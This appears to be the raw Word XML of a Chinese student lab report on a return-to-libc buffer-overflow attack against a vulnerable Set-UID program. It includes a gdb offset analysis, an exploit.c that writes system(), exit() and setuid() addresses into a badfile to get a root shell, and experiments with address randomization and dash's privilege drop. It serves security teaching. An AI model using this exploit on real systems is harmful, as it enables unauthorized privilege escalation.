          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，可以验证字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>确实</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了子进程。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Step2.将MYSHELL作为system()的参数， 使用程序findloc.c来找到这个变量在内存中的位置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821690</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4235450" cy="298450"/>
                <wp:effectExtent l="6350" t="6350" r="1270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9180" y="4806950"/>
                          <a:ext cx="42354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6pt;margin-top:64.7pt;height:23.5pt;width:333.5pt;z-index:251658240;v-text-anchor:middle;mso-width-relative:page;mso-height-relative:page;" filled="f" stroked="t" coordsize="21600,21600" o:gfxdata="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MZyRkdgAAAALAQAADwAAAAAAAAABACAAAAAiAAAAZHJzL2Rvd25yZXYueG1sUEsBAhQAFAAA&#10;AAgAh07iQIMnWX9hAgAAlAQAAA4AAAAAAAAAAQAgAAAAJwEAAGRycy9lMm9Eb2MueG1sUEsFBgAA&#10;AAAGAAYAWQEAAPoF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3515" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="QFX_SUNTZ`][`%@(CDVMQ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FX_SUNTZ`][`%@(CDVMQ2W"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect b="278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8595" cy="384175"/>
            <wp:effectExtent l="0" t="0" r="1905" b="9525"/>
            <wp:docPr id="21" name="图片 21" descr="2M{}DUSH3IKS@5LHI]TS6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M{}DUSH3IKS@5LHI]TS6L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如上图所示，MYSHELL变量（即shell字符串）在内存中的地址为0xbfffff48。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Exploiting the buffer-overflow vulnerability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Step1.利用函数调用流程中栈的ebp和esp的变化，确定XYZ与ebp的关系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为了实现攻击，需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用system的地址覆盖返回地址，在合适的位置填入“/bin/sh"字符串所在内存地址，这个合适的位置是system的参数地址。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3675" cy="2224405"/>
            <wp:effectExtent l="0" t="0" r="9525" b="10795"/>
            <wp:docPr id="29" name="图片 29" descr="X{B%$)GM{B%B0MPOQ[CQ1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X{B%$)GM{B%B0MPOQ[CQ1AQ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整个函数调用流程中ebp和esp的变化如上图所示。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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先是离开函数，执行的是离开函数的操作。所以用system的函数地址覆盖return address = ebp+4。此时esp指向的位置如(b)图所示。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2、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>接着是进入一个函数，执行的是进入函数的操作。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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>push ebp，所以函数地址被ebp的内容覆盖; esp+4;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（2）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mov ebp,esp ,所以ebp的位置如图©所示；ebp+8是我们的参数位置，位置如圆圈１所示；这个位置等于原来的ebp + 12。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（3）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>圆圈２在现在ebp+4位置，是system的返回地址，原来ebp+8的位置，可以用来设置exit。虽然我认为这个没什么用。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（4）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sub esp,$N;给local变量开辟部分内存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ind w:firstLine="482" w:firstLineChars="200"/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所以，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syste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m()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的函数地址覆盖return address = ebp+4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；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/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字符串“/bin/sh”</w:t>
      </w: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参数位置等于ebp + 12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；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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ebp+8的位置，可以用exit函数的内存位置填充，作为返回地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="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。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因而，接下来只需要得出ebp到buffer的偏移量即可。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805680" cy="2993390"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
            <wp:docPr id="17" name="图片 17" descr="RGMD{U87Q~Z_FCA`7{{LP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GMD{U87Q~Z_FCA`7{{LP@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利用gdb调试retlib程序，在bof函数处设置断点，得出ebp与buffer之间的偏移量为20。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所以，“bin/sh”对应的X值为32（20+12），system()对应的Y值为24（20+4），exit()对应的Z值为28（20+8）。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Step2.补全有漏洞的代码exploit.c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/* exploit.c */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#include &lt;stdlib.h&gt;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#include &lt;stdio.h&gt;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#include &lt;string.h&gt;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int main(int argc, char **argv)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{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char buf[40];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FILE *badfile;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badfile = fopen("./badfile", "w");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minor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>*(long *) &amp;buf[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32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 xml:space="preserve">] = 0xbfffff48 ; // "/bin/sh" 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①</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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>*(long *) &amp;buf[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24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 xml:space="preserve">] = 0xb7e5f430 ; // system() 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②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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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>*(long *) &amp;buf[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28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14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">] = 0xb7e52fb0 ; // exit() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs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③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fwrite(buf, sizeof(buf), 1, badfile);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fclose(badfile);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①②③分别对应了</w:t>
      </w:r>
      <w:r>
        <w:t>BIN_SH、system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>、exit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>的地址。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这些地址都已经在前面的task中获得了，分别为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0xbfffff48，0xb7e5f430，0xb7e52fb0。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X,Y,Z的值也已经在Step1中确定，分别为32,24,28。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Step3.编译exploit.c并运行，实施攻击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320665" cy="265430"/>
            <wp:effectExtent l="0" t="0" r="635" b="1270"/>
            <wp:docPr id="23" name="图片 23" descr="`I4`$$JP4WB5$5DK$RTGV%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`I4`$$JP4WB5$5DK$RTGV%E"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:srcRect r="8524" b="28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9230" cy="537210"/>
            <wp:effectExtent l="0" t="0" r="1270" b="8890"/>
            <wp:docPr id="22" name="图片 22" descr="0A)Q55X1N13CEAUKKKX)8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A)Q55X1N13CEAUKKKX)8X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如上图所示，成功获得一个root shell，攻击成功。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Turning on address randomization（打开地址随机化保护机制）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default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Step1.打开address randomization保护机制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Step2.重新执行攻击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325" cy="756285"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5715"/>
            <wp:docPr id="24" name="图片 24" descr="BICY723YO0)X9JQPD}TIS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CY723YO0)X9JQPD}TIS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如上图所示，在打开了地址随机化保护机制后，重新执行执勤啊的攻击，发现无法获得一个root shell，攻击失败。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是由于在之前的实验里，地址随机化被关闭，对于同一个程序，它所处的地址不会发生变化，因而写入exploit.c的XYZ的值以及对应的地址适用于每次执行。但是当地址随机化保护机制开启后，写在exploit.c中的固定值就不符合每次执行的需求，因而攻击无法成功。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新建一个空白的badfile，使用gdb调试retlib1。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0500" cy="312420"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="28" name="图片 28" descr="K6SP3YHSL7PE_K%K6CYJ1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K6SP3YHSL7PE_K%K6CYJ1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首先开启gdb的地址随机化机制。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8595" cy="3588385"/>
            <wp:effectExtent l="0" t="0" r="1905" b="5715"/>
            <wp:docPr id="26" name="图片 26" descr="DIZ``P60EK7(F{JO17UV9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IZ``P60EK7(F{JO17UV9_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可以看到，system()的地址由0xb7e5f430变为了0xb75c1430，exit的地址由0xb7e52fb0变为了0xb75b4fb0。ebp和buffer之间的值仍然为20，所以XYZ的值都未变化。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960" cy="316865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="27" name="图片 27" descr="S_S@V2U{@}2U}~XKK2QC@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_S@V2U{@}2U}~XKK2QC@7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重新运行findloc程序，寻找“/bin/sh”的地址，发现地址由0xbfffff48变为了bfcebf48。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综上所述，X,Y,Z的值不变（badfile中的写入值是正确的），但是三个地址都发生了变化（badfile中的写入值是不正确的）。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Defeat Shell’s countermeasure（破解dash对抗策略）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当/bin/sh指向/bin/dash时，我们不能直接返回到system()函数，因为system()实际上使用/bin/sh执行命令，而/bin/dash将降低特权。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480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解决这个问题有很多方法，其中一种方法是在调用system()之前调用setuid(0)。setuid(0)将EUID和RUID设置为0，将进程转换为非SET-UID。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以本task的重点在于，应当修改exploit.c，在调用系统函数system(“/bin/sh”)之前，先调用系统函数setuid(0)来提升权限。</w:t>
      </w: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Step1.修改exploit.c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首先，关闭地址随机化机制。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在bof的返回地址处（&amp;buf[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>]）写入setuid()的地址，setuid的参数0写在与其入口地址相隔一个字的位置（即buf[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>]）处（因为setuid()执行完毕之后，会转向存放setuid入口地址的下一个位置，所以这个位置应该放入system函数的入口地址），同理system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>放在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>&amp;buf[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>“/bin/shell”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>放入&amp;buf[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>36</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>]处。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9865" cy="2493645"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="33" name="图片 33" descr="C_29Y_SM[939CAK}X)R)7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_29Y_SM[939CAK}X)R)7B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>由上图可知，setuid地址为0xb7ed8e40，修改exploit.c如下：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/* exploit.c */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&lt;stdlib.h&gt;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&lt;stdio.h&gt;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#include &lt;string.h&gt;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int main(int argc, char **argv)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{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char buf[40];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FILE *badfile;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badfile = fopen("./badfile", "w");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="480" w:hanging="482" w:hangingChars="200"/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*(long *) &amp;buf[36] = 0xbfffff48 ; // "/bin/sh" </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="480" w:hanging="482" w:hangingChars="200"/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*(long *) &amp;buf[28] = 0xb7e5f430 ; // system()  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="480" w:hanging="482" w:hangingChars="200"/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*(long *) &amp;buf[24] = 0xb7ed8e40 ; // setuid() </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="480" w:hanging="482" w:hangingChars="200"/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*(long *) &amp;buf[32] = 0 ; // setuid parameter 0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fwrite(buf, sizeof(buf), 1, badfile);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fclose(badfile);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ind w:left="480" w:hanging="480" w:hangingChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32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281" w:hanging="281" w:hangingChars="1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Step2.重新执行攻击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3040" cy="639445"/>
            <wp:effectExtent l="0" t="0" r="10160" b="8255"/>
            <wp:docPr id="32" name="图片 32" descr="OK4OG[GJEK_59%S%`(8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OK4OG[GJEK_59%S%`(822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可以看到，攻击成功，成功破解了dash的对抗策略。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oas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A03FE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4D2A03FE"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="7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07DC"/>
    <w:rsid w:val="00423378"/>
    <w:rsid w:val="005A1FB2"/>
    <w:rsid w:val="00823A4F"/>
    <w:rsid w:val="00C731EC"/>
    <w:rsid w:val="012B2DC4"/>
    <w:rsid w:val="013F21EF"/>
    <w:rsid w:val="01657A54"/>
    <w:rsid w:val="018E1604"/>
    <w:rsid w:val="01FA6987"/>
    <w:rsid w:val="0227360D"/>
    <w:rsid w:val="027B130B"/>
    <w:rsid w:val="02896C3E"/>
    <w:rsid w:val="0291600D"/>
    <w:rsid w:val="02C70026"/>
    <w:rsid w:val="02CE223A"/>
    <w:rsid w:val="02F81E0A"/>
    <w:rsid w:val="033761A0"/>
    <w:rsid w:val="033B1184"/>
    <w:rsid w:val="03444FD9"/>
    <w:rsid w:val="03503841"/>
    <w:rsid w:val="037934C6"/>
    <w:rsid w:val="037A3097"/>
    <w:rsid w:val="03CB7A5D"/>
    <w:rsid w:val="03FD70AF"/>
    <w:rsid w:val="040D6E22"/>
    <w:rsid w:val="041250BB"/>
    <w:rsid w:val="046A3DAC"/>
    <w:rsid w:val="046D0F45"/>
    <w:rsid w:val="04A91800"/>
    <w:rsid w:val="04B524B2"/>
    <w:rsid w:val="04BC718F"/>
    <w:rsid w:val="04E15091"/>
    <w:rsid w:val="04E41073"/>
    <w:rsid w:val="05397937"/>
    <w:rsid w:val="05683ADB"/>
    <w:rsid w:val="059360E0"/>
    <w:rsid w:val="05B1617E"/>
    <w:rsid w:val="05CE75E1"/>
    <w:rsid w:val="06040233"/>
    <w:rsid w:val="06136EAF"/>
    <w:rsid w:val="06356F4C"/>
    <w:rsid w:val="06485FDE"/>
    <w:rsid w:val="069520F8"/>
    <w:rsid w:val="06E16F57"/>
    <w:rsid w:val="072D4BF3"/>
    <w:rsid w:val="07440DB4"/>
    <w:rsid w:val="077274F4"/>
    <w:rsid w:val="0774142C"/>
    <w:rsid w:val="07991B55"/>
    <w:rsid w:val="07BA3E24"/>
    <w:rsid w:val="08314FCD"/>
    <w:rsid w:val="0871551B"/>
    <w:rsid w:val="0882236F"/>
    <w:rsid w:val="08E2148E"/>
    <w:rsid w:val="093307A3"/>
    <w:rsid w:val="094128CB"/>
    <w:rsid w:val="095963FF"/>
    <w:rsid w:val="09832117"/>
    <w:rsid w:val="0A5C2108"/>
    <w:rsid w:val="0A701AD1"/>
    <w:rsid w:val="0AA51E3A"/>
    <w:rsid w:val="0AC52C97"/>
    <w:rsid w:val="0B0B2695"/>
    <w:rsid w:val="0B3D724D"/>
    <w:rsid w:val="0B6E59D6"/>
    <w:rsid w:val="0B871CF8"/>
    <w:rsid w:val="0B983811"/>
    <w:rsid w:val="0BB56FEE"/>
    <w:rsid w:val="0BC01556"/>
    <w:rsid w:val="0BC50B98"/>
    <w:rsid w:val="0BC5796E"/>
    <w:rsid w:val="0BCA50E1"/>
    <w:rsid w:val="0BD62F83"/>
    <w:rsid w:val="0BE53343"/>
    <w:rsid w:val="0BEC16C3"/>
    <w:rsid w:val="0C0F3006"/>
    <w:rsid w:val="0C176B4C"/>
    <w:rsid w:val="0C307111"/>
    <w:rsid w:val="0C7C1F29"/>
    <w:rsid w:val="0C7F1B9C"/>
    <w:rsid w:val="0C8131FF"/>
    <w:rsid w:val="0D4F0430"/>
    <w:rsid w:val="0D57112C"/>
    <w:rsid w:val="0D8570E3"/>
    <w:rsid w:val="0DB24AA8"/>
    <w:rsid w:val="0E162301"/>
    <w:rsid w:val="0E2A0A3F"/>
    <w:rsid w:val="0E2C57D5"/>
    <w:rsid w:val="0E59670E"/>
    <w:rsid w:val="0E993408"/>
    <w:rsid w:val="0E9D39D7"/>
    <w:rsid w:val="0EC12D3A"/>
    <w:rsid w:val="0ED25C51"/>
    <w:rsid w:val="0F54368C"/>
    <w:rsid w:val="0F5E1B6D"/>
    <w:rsid w:val="0FA86E17"/>
    <w:rsid w:val="100A19B8"/>
    <w:rsid w:val="10154FF6"/>
    <w:rsid w:val="101B4A31"/>
    <w:rsid w:val="104468A3"/>
    <w:rsid w:val="10521F2E"/>
    <w:rsid w:val="10756A44"/>
    <w:rsid w:val="109B463D"/>
    <w:rsid w:val="10CC5A59"/>
    <w:rsid w:val="115F170F"/>
    <w:rsid w:val="118E64C9"/>
    <w:rsid w:val="11AB5BF2"/>
    <w:rsid w:val="11AC00A9"/>
    <w:rsid w:val="11B30B33"/>
    <w:rsid w:val="11C976EE"/>
    <w:rsid w:val="11E57B34"/>
    <w:rsid w:val="11F41F30"/>
    <w:rsid w:val="11FD4343"/>
    <w:rsid w:val="12127476"/>
    <w:rsid w:val="124D6761"/>
    <w:rsid w:val="12507D59"/>
    <w:rsid w:val="12592E00"/>
    <w:rsid w:val="1271310D"/>
    <w:rsid w:val="12713CF0"/>
    <w:rsid w:val="129B6BB7"/>
    <w:rsid w:val="129F1AFB"/>
    <w:rsid w:val="12D064E0"/>
    <w:rsid w:val="12E847BC"/>
    <w:rsid w:val="1324457F"/>
    <w:rsid w:val="136812C3"/>
    <w:rsid w:val="136B4CDE"/>
    <w:rsid w:val="139763E3"/>
    <w:rsid w:val="13DA65ED"/>
    <w:rsid w:val="147922FD"/>
    <w:rsid w:val="14CE158D"/>
    <w:rsid w:val="14E26FDA"/>
    <w:rsid w:val="157D2356"/>
    <w:rsid w:val="158C5073"/>
    <w:rsid w:val="158D0D8A"/>
    <w:rsid w:val="15C40FB2"/>
    <w:rsid w:val="15C83EC6"/>
    <w:rsid w:val="15C85165"/>
    <w:rsid w:val="15CF1935"/>
    <w:rsid w:val="164322D7"/>
    <w:rsid w:val="16652C24"/>
    <w:rsid w:val="16E45E37"/>
    <w:rsid w:val="16F60DAD"/>
    <w:rsid w:val="171118A4"/>
    <w:rsid w:val="17297D89"/>
    <w:rsid w:val="175E59B8"/>
    <w:rsid w:val="17622BE9"/>
    <w:rsid w:val="17715369"/>
    <w:rsid w:val="17873764"/>
    <w:rsid w:val="17AF3723"/>
    <w:rsid w:val="17B46237"/>
    <w:rsid w:val="17C94D7A"/>
    <w:rsid w:val="1806751B"/>
    <w:rsid w:val="1820460C"/>
    <w:rsid w:val="182732F7"/>
    <w:rsid w:val="182D0CC0"/>
    <w:rsid w:val="18937956"/>
    <w:rsid w:val="18995C39"/>
    <w:rsid w:val="189D0F0D"/>
    <w:rsid w:val="192F2CF3"/>
    <w:rsid w:val="193436A2"/>
    <w:rsid w:val="196E00EE"/>
    <w:rsid w:val="19A873A2"/>
    <w:rsid w:val="19CA2215"/>
    <w:rsid w:val="19CD609F"/>
    <w:rsid w:val="19DB26E5"/>
    <w:rsid w:val="19FF3A50"/>
    <w:rsid w:val="1A1634A9"/>
    <w:rsid w:val="1A482B8D"/>
    <w:rsid w:val="1A941D43"/>
    <w:rsid w:val="1A9460D2"/>
    <w:rsid w:val="1B1A3D43"/>
    <w:rsid w:val="1B1F0F9E"/>
    <w:rsid w:val="1B555F4C"/>
    <w:rsid w:val="1B6A2DE4"/>
    <w:rsid w:val="1BAC49E3"/>
    <w:rsid w:val="1BC77F76"/>
    <w:rsid w:val="1BE835ED"/>
    <w:rsid w:val="1C256BFC"/>
    <w:rsid w:val="1C3D1E6F"/>
    <w:rsid w:val="1C5446B6"/>
    <w:rsid w:val="1C615B7E"/>
    <w:rsid w:val="1CA13FF0"/>
    <w:rsid w:val="1D2414C1"/>
    <w:rsid w:val="1D26501F"/>
    <w:rsid w:val="1D4246DF"/>
    <w:rsid w:val="1D5865C9"/>
    <w:rsid w:val="1D8A1A87"/>
    <w:rsid w:val="1D9E3B92"/>
    <w:rsid w:val="1DAA63DB"/>
    <w:rsid w:val="1DD14882"/>
    <w:rsid w:val="1E342C82"/>
    <w:rsid w:val="1E503873"/>
    <w:rsid w:val="1E6B4B5B"/>
    <w:rsid w:val="1E9B01E4"/>
    <w:rsid w:val="1F234676"/>
    <w:rsid w:val="1F474DC6"/>
    <w:rsid w:val="1F9536E3"/>
    <w:rsid w:val="1FF7476D"/>
    <w:rsid w:val="20150C6C"/>
    <w:rsid w:val="207841EB"/>
    <w:rsid w:val="209A3A4F"/>
    <w:rsid w:val="210846A2"/>
    <w:rsid w:val="211771BF"/>
    <w:rsid w:val="21705B54"/>
    <w:rsid w:val="21A7052E"/>
    <w:rsid w:val="21AD0498"/>
    <w:rsid w:val="21E51665"/>
    <w:rsid w:val="21E92699"/>
    <w:rsid w:val="22275D82"/>
    <w:rsid w:val="222F6F6D"/>
    <w:rsid w:val="22617FA9"/>
    <w:rsid w:val="22687BE3"/>
    <w:rsid w:val="22701C91"/>
    <w:rsid w:val="22E875FF"/>
    <w:rsid w:val="22F612B8"/>
    <w:rsid w:val="23922ED3"/>
    <w:rsid w:val="23D966D5"/>
    <w:rsid w:val="242C6783"/>
    <w:rsid w:val="24931EA3"/>
    <w:rsid w:val="24EB2F75"/>
    <w:rsid w:val="24F13A19"/>
    <w:rsid w:val="253D2050"/>
    <w:rsid w:val="255951DC"/>
    <w:rsid w:val="257A0A62"/>
    <w:rsid w:val="25876F2C"/>
    <w:rsid w:val="25A32A01"/>
    <w:rsid w:val="25D916DC"/>
    <w:rsid w:val="25F267A6"/>
    <w:rsid w:val="261E76EA"/>
    <w:rsid w:val="26BD6A60"/>
    <w:rsid w:val="27385B3A"/>
    <w:rsid w:val="273C3FE7"/>
    <w:rsid w:val="274E71D9"/>
    <w:rsid w:val="276C6C24"/>
    <w:rsid w:val="27A5737E"/>
    <w:rsid w:val="280766F3"/>
    <w:rsid w:val="280A54EE"/>
    <w:rsid w:val="28A91135"/>
    <w:rsid w:val="28B87CAC"/>
    <w:rsid w:val="28C0754C"/>
    <w:rsid w:val="28E94803"/>
    <w:rsid w:val="28EA109F"/>
    <w:rsid w:val="2904534D"/>
    <w:rsid w:val="290E6A57"/>
    <w:rsid w:val="293C04D1"/>
    <w:rsid w:val="295716F9"/>
    <w:rsid w:val="296033BC"/>
    <w:rsid w:val="29917E59"/>
    <w:rsid w:val="29B84D3A"/>
    <w:rsid w:val="29CC021B"/>
    <w:rsid w:val="2A1C00F2"/>
    <w:rsid w:val="2A7B7B90"/>
    <w:rsid w:val="2AFE4363"/>
    <w:rsid w:val="2B0277A9"/>
    <w:rsid w:val="2B15775F"/>
    <w:rsid w:val="2B3B46E7"/>
    <w:rsid w:val="2B713EDE"/>
    <w:rsid w:val="2B852893"/>
    <w:rsid w:val="2BD719A6"/>
    <w:rsid w:val="2BDC5290"/>
    <w:rsid w:val="2BE208FF"/>
    <w:rsid w:val="2C225223"/>
    <w:rsid w:val="2C2A54EF"/>
    <w:rsid w:val="2C4E2C9F"/>
    <w:rsid w:val="2C8824D4"/>
    <w:rsid w:val="2CDC2DB7"/>
    <w:rsid w:val="2D0341FD"/>
    <w:rsid w:val="2D56245D"/>
    <w:rsid w:val="2D89369C"/>
    <w:rsid w:val="2DD2320B"/>
    <w:rsid w:val="2DD53689"/>
    <w:rsid w:val="2DD939D4"/>
    <w:rsid w:val="2DE35837"/>
    <w:rsid w:val="2DFD3C22"/>
    <w:rsid w:val="2E1C28B9"/>
    <w:rsid w:val="2E616C9F"/>
    <w:rsid w:val="2E7E0FBA"/>
    <w:rsid w:val="2EB943F3"/>
    <w:rsid w:val="2EBA073D"/>
    <w:rsid w:val="2F053185"/>
    <w:rsid w:val="2F5A6F86"/>
    <w:rsid w:val="2FD212F6"/>
    <w:rsid w:val="2FF95AD3"/>
    <w:rsid w:val="303E64F2"/>
    <w:rsid w:val="307522A5"/>
    <w:rsid w:val="30843347"/>
    <w:rsid w:val="30B10BC0"/>
    <w:rsid w:val="30B4323D"/>
    <w:rsid w:val="314519F7"/>
    <w:rsid w:val="315B15E2"/>
    <w:rsid w:val="31636F42"/>
    <w:rsid w:val="31B96A0D"/>
    <w:rsid w:val="32035958"/>
    <w:rsid w:val="32245D35"/>
    <w:rsid w:val="32795744"/>
    <w:rsid w:val="3281400B"/>
